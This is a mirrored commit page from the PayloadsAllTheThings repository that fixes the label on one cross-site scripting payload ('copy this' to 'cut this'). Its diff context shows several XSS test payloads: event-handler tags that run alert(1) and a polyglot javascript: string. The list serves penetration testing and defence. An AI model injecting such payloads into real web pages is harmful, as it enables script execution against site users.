mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 17:02:53 +01:00
Copy this -> Cut this
Change copy to cut instruction
This commit is contained in:
parent
c60f264664
commit
f44d014fc2
1 changed files with 1 additions and 1 deletions
|
|
@ -63,7 +63,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||||||
<x onclick=alert(1)>click this!
|
<x onclick=alert(1)>click this!
|
||||||
<x oncopy=alert(1)>copy this!
|
<x oncopy=alert(1)>copy this!
|
||||||
<x oncontextmenu=alert(1)>right click this!
|
<x oncontextmenu=alert(1)>right click this!
|
||||||
<x oncut=alert(1)>copy this!
|
<x oncut=alert(1)>cut this!
|
||||||
<x ondblclick=alert(1)>double click this!
|
<x ondblclick=alert(1)>double click this!
|
||||||
<x ondrag=alert(1)>drag this!
|
<x ondrag=alert(1)>drag this!
|
||||||
<x contenteditable onfocus=alert(1)>focus this!
|
<x contenteditable onfocus=alert(1)>focus this!
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue